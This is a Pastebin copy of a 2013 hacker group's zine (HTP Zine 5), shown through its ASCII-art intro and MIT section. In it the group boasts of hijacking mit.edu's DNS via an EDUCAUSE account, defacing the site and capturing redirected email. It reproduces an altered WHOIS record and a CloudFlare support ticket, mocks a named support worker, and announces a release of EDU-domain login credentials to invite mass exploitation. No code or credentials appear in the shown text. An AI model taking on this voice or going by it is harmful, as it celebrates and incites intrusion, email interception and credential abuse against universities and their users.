Advertisement
Guest User

htp5

a guest
May 8th, 2013
583
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 126.48 KB | None | 0 0
  1.  
  2. HTP Zine 5
  3.  
  4. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  5.  
  6. ▄▄▄▄▄▄▄▄▄
  7. ██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro █ █
  8. █████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU ▀▀▀█ █▀▀
  9. ███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode █ █
  10. █▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap █ █▄▄▄▄▄▄▄▄▄
  11. ███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri ▀▀▀▀█ █
  12. █▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD █ █▀█ █
  13. █▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark █ █▄█ █
  14. █▓█ ________________________________ █▓█ > Art █ █▄▄▄▄▄▄
  15. █▓█ HTP____________________MWTB_DLTR ███ > Zerodays ▀▀▀▀▀▀▀█ █
  16. ██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro █ █▀▀▀▀
  17. █▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > See reverse for █ █▄▄▄▄
  18. ████ ████████████████████▓▓██████ ████ > HTP4 █ █
  19. ▀▀▀▀▀▀▀▀
  20.  
  21. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  22.  
  23.  
  24. █████████████▒████████
  25. ▓▒██████▒░█░███░░ ▒███████████▒
  26. ███████████ ▓█████████████████████▒
  27. ▓████ ▒█████████▒▒░███████████████████████▒
  28. ░▒███████░████████▒██ ▒██████████████████████░
  29. ▓███████████████▒██ ░█ ░████████████████████████░
  30. ████████████████████▒ ███▒█████████████████████████████
  31. ░████████▒██████████████████ ▒█████████████████████████▒
  32. ███████████▒████████████ ▒ ███████████████████████████▒
  33. ▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒
  34. █████████ ▒███▒ ███████░ ███████████████████████████████████
  35. █████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████
  36. ▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████
  37. ░████████████████████░▓█░ ░█ ░▓███████████████████████████████████
  38. ███████████████████▓ ░ █ ░██████████████████████████████████
  39. ████████████████████ █▒ ██░▒███████████████████████████████████
  40. ▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████
  41. ░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████
  42. ██████████████████ ▓███ █░ █████████████▓██████████████████ █
  43. ██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓
  44. ██████████████████░ ▓ █░ █ ███████████████████████████████░
  45. ██████████████████ ██ ▒███ ████████████████████████████████▒█
  46. ███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █
  47. ███████████████▒▒▒ ███ ████████████████████████████▒ █░
  48. █░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓
  49. ██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒
  50. ▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██
  51. ███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░
  52. ██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████
  53. ░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████
  54. ▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████
  55. █▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████
  56. ██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████
  57. ██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓
  58. ███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓
  59. █▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████
  60. ▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓
  61. █▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██
  62. ██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██
  63. █▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░
  64. ████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███
  65. █████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██
  66. █▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒
  67. ▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒
  68. ▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓
  69. ▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒
  70. ▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓
  71. ███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒
  72. ▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████
  73. /████████ /████████ /██████████████████ /███████████████▄
  74. |▒████████ |████████ |▒██████████████████ |▒█████████████████
  75. |▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
  76. |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
  77. |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
  78. |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
  79. |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
  80. |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
  81. |▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
  82. |▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
  83. |▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
  84. |▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
  85. |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
  86.  
  87. htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
  88. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  89.  
  90. NORTH KOREA OF THE INTERNET SINCE 2011
  91.  
  92. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  93.  
  94. So its been 182 days since our last zine, since then our dedicated team
  95. of researchers, philanthropists, playboys and troublemakers have been
  96. busy at work scouring the Internet for high quality entertainment at the
  97. expense of everybody who isn't us.
  98.  
  99. 5/1 also marks the day HTP was founded, which means we've had two
  100. glorious years of being the best and owning the rest. Today we will be
  101. drinking 40s, listening to some balla tunes, and circlejerking over the
  102. inevitable confusion, awe, bitterness and jokes that will ensue from
  103. this release. :)
  104.  
  105. Due to the immense size of HTP5, this zine is unfortunately not self
  106. extracting. However do not fret, this zine is full HD and 4D ready.
  107. We've divided everything into its own section just to keep things sane.
  108.  
  109. So go get the popcorn ready and strap in for a long and wild ride. This
  110. zine is a tale of trust, betrayal, brotherhood, rampant paranoia,
  111. hilariously shoddy police work (More on that later), and the plight of
  112. the whitehat sheep being fleeced at will by their blackhat shepherds.
  113. It's really only missing a tacked on love story, a few good car chases,
  114. and an explosion at the end, but it might not be too late for all of that.
  115.  
  116.  
  117. ▀ ▄
  118. █▄▄
  119. ▄____ ░ █▄
  120. ▄ ▄███▀▀ \;',`'-,▓█░
  121. ▓██▀-;_,; ':-;_,'.█▓░
  122. ▓▓██; '/ , _`.-\█▓
  123. ░▓███▄'`. (` /` ` \`|█
  124. ░ ▓▓▓ █|██ `\`-. \_ / |▓
  125. ░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
  126. ░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
  127. ▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
  128. ░██▓▀ ▀█████████████████▄.-'`
  129. ███░ ███▀▀███▀▀███ ███
  130. █████████ ███ ███▄▄███ 2013 ▒ ░
  131. █████████ ███ ██████▀
  132. ███ ███ ███ ███
  133. ▄███▄ ▄███▄ ███ ▄███▄
  134. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  135. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  136.  
  137.  
  138. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
  139.  
  140.  
  141. ░████▓██▓██▓▒▒▒░
  142. ░▒██████▓▓███████▒████▒░░░░
  143. ░▓████████████████▒██▓████▒▒░░ ░░ ░░░░
  144. ░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░
  145. ▒████████████████████████████████▓▓▓██████▓ ▒ ░░
  146. █▓▓███████████████████████████████████████▓▓▓ ░ ░ ░▒
  147. ░▓▓█▓███████████████████████████████████████████░ ▒ ░ ▒░
  148. ▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒ ░
  149. ░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░ ░ ░
  150. ░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒ ░ ░░
  151. ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░
  152. ░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█ ▒░
  153. ░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
  154. ░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
  155. ▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
  156. ▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
  157. ▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
  158. █▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
  159. ░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
  160. ░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
  161. ░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
  162. ▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
  163. ██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
  164. ██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
  165. ████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
  166. █▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
  167. ▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
  168. ▒█▒░ ▓ ░▒▒░ ░ ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
  169. ░█▒░ ░ ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
  170. ░░ ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
  171. ░ ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
  172. ░ ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
  173. ░ ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░ ░░░▒░▒█████████
  174. ░░░░ ░▒▓▒ ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
  175. ░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
  176. ░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
  177. ░ ░▒▒▒░ ░░▒▒░░ ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
  178. ░░░░░ ░▒▒░░ ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
  179. ░░░ ░▒▒░░ ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
  180. ░░ ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
  181. ░░ ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
  182. ░░ ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
  183. ░░░ ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
  184. ░░ ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
  185. ░ ░░░░░ ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
  186. ░░ ░▒░░░░░ ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
  187. ░░░░░ ░░▒▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
  188. ░▓▒▒▒▒▒▓░ ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
  189. ▒░░░ ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
  190. ░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░
  191. ░ ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░
  192. ░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒
  193. ░▒▒▒▒▒▒▒▓▓▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░
  194. ░▒▒ ░░░ ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░
  195. ░ ░░░░░ ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░
  196. ░▒▒▓▓▒░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒
  197. ░░░▒▒░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░
  198. ░ ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░
  199. ░ ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░
  200. ░ ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░
  201. ░ ░░░▒▒▒▒▒▒▒▒▒░ ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
  202. ░░ ░▒▒▒▒▒▒▒▒░░ ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
  203. ░░░▒▒▒▒▒░░░ ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
  204. ░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
  205. ░ ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
  206. ░ ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
  207. ░ ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
  208. ░ ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
  209. ░ ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
  210. ░ ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
  211. ▒ ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
  212. ▒▒██ ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
  213. ░▒█▓██▒ ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
  214. ▓███▓██ ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
  215. ░░█████▓▒ ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
  216. ░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
  217. ░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
  218. ░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
  219. ▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
  220. ░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
  221. ▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
  222. ███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
  223. ███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
  224. ▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
  225. ▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
  226. ░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
  227. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  228. "What's the score?"
  229. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  230.  
  231. ██ ██ ██ ██ █████ HTP5
  232. ██ ██ ██ ▄▄ ▄▄
  233. ██ ▀▀ ██ ██ ██ FEATURING EDUCAUSE
  234. ▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  235.  
  236. Back in January we decided to upstage Anonymous (again) and have a little fun
  237. with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.
  238. In doing so, we knew we had to make it very clear that it was an anti-Anonymous
  239. deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus
  240. why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH
  241. ANONYMOUS." Despite all this, some of the cluebags in the media apparently
  242. thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss
  243. leejun y0!" Additionally, almost everybody missed the fact that it was a troll
  244. deface, which just proves that it will be a few decades before we reach October
  245. 1st, 1993.
  246.  
  247. MIT's reaction was particularly lulzy. They did a better job of reporting the
  248. facts than all the media outlets, but they couldn't decide whether the e-mail
  249. got intercepted or not. First, there was this from
  250. http://tech.mit.edu/V132/N62/hack.html:
  251.  
  252. "Unlike previous attacks, which temporarily disabled some services, this attack
  253. had the potential to be much more severe. A more calculated hacker could have
  254. intercepted email messages intended for anyone at the MIT.edu domain, including
  255. all alumni who use alum.mit.edu email addresses."
  256.  
  257. After having a day to do a better post-mortem, MIT started freaking out. They
  258. published this: http://tech.mit.edu/V132/N63/hack.html. From that link:
  259.  
  260. "Unlike previous attacks, which temporarily disabled some services, this attack
  261. had the potential to be much more severe. Email was specifically affected. Mail
  262. is normally received by one of nine different MIT servers; however today, mail
  263. that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at
  264. KAIST, Korea Advanced Institute of Science and Technology, meaning the
  265. attackers had complete control of emails successfully sent during that time."
  266.  
  267. We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail
  268. when we see it :P. So who owned the domain? Well :
  269.  
  270. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  271.  
  272. Domain Name: MIT.EDU
  273.  
  274. Registrant:
  275. Massachusetts Institute of Technology
  276. Cambridge, MA 02139
  277. UNITED STATES
  278.  
  279. Administrative Contact:
  280. I got owned
  281. Massachusetts Institute of Technology
  282. MIT Room W92-167, 77 Massachusetts Avenue
  283. Cambridge, MA 02139-4307
  284. UNITED STATES
  285. (617) 324-1337
  286. cunt@mit.edu
  287.  
  288. Technical Contact:
  289. OWNED NETWORK OPERATIONS
  290. ROOT
  291. US
  292. DESTROYED, MA 02139-4307
  293. UNITED STATES
  294. (617) 253-1337
  295. owned@mit.edu
  296.  
  297. Name Servers:
  298. FRED.NS.CLOUDFLARE.COM
  299. KATE.NS.CLOUDFLARE.COM
  300.  
  301. Domain record activated: 23-May-1985
  302. Domain record last updated: 22-Jan-2013
  303. Domain expires: 31-Jul-2013
  304.  
  305. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  306.  
  307.  
  308. Here's the cherry on top:
  309.  
  310. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  311.  
  312.  
  313. From: "CloudFlare Support" <support@cloudflare.com>
  314. Subject: [CloudFlare Support] Pending request: Why is cloudflare staff
  315. modifying my dns records? (ticket #12053)
  316. Date: Wed, January 23, 2013 4:48 pm
  317. To: "Fuckmit" <fuckmit@tormail.org>
  318.  
  319. ##- Please type your reply above this line -##
  320.  
  321. [CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns
  322. records? (ticket #12053)
  323.  
  324. This is an email to remind you that your request (#12053) is pending and awaits
  325. your feedback.
  326.  
  327. Please click the link below to review and update your request:
  328. http://support.cloudflare.com/tickets/12053
  329.  
  330. ----------------------------------------------
  331.  
  332. Justin, Jan 22 11:48 am (PST)
  333.  
  334. Hi,
  335.  
  336. We have reason to believe you are not the actual owner of the mit.edu domain.
  337. We have been in contact with the actual owner this morning.
  338.  
  339. As such we have taken steps to secure the account, and the domain has already
  340. been returned to the actual owner.
  341.  
  342. ----------------------------------------------
  343.  
  344. Fuckmit, Jan 22 11:45 am (PST)
  345.  
  346. Two questions:
  347. Why is cloudflare staff modifying my dns records without authorization?
  348. Why is cloudflare staff repeatedly regenerating my API key every time they
  349. decide to modify my dns records without authorization?
  350.  
  351. --------------------------------
  352. This email is a service from CloudFlare Support
  353.  
  354. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  355.  
  356.  
  357. You have reason to believe a user named 'Fuckmit' is not the legitimate owner
  358. of mit.edu? Excellent deduction, Justin.
  359.  
  360. Soon after, we decided to troll Gizmodo and the rest of the media into
  361. preserving our access. The 'browser exploit' on MIT's NOC
  362. ( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )
  363. never existed. We'd never show our full hand at once, we'd just lose access.
  364.  
  365. MIT certainly believed us though, despite their own reassurances otherwise. For
  366. confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)
  367. after finally asserting that we got access to their EDUCAUSE account.
  368.  
  369. EDUCAUSE then made the fatal mistake of overlooking our complete access into
  370. the EDU TLD. Though, we can't say we expect much from a registrar running ASPX
  371. on their backend.
  372.  
  373. Now, just in case you don't believe us, we have entrusted the login credentials
  374. of nearly every EDU domain to hackers worldwide (active as we speak) within the
  375. MIT section of this zine. So, let's see what happens first, mass exploitation
  376. or whitehat response? ;) We are not ones for defacing, actually, and we're
  377. going to leave that up to the Internet Justice League (AKA Anonymous) if they
  378. can even get to it on time. And we figure they'll manifest some statement
  379. about how its morally justifiable to deface *.edu. We frankly don't care.
  380.  
  381. By the end of today (5/6), EDU operation should return to normal.
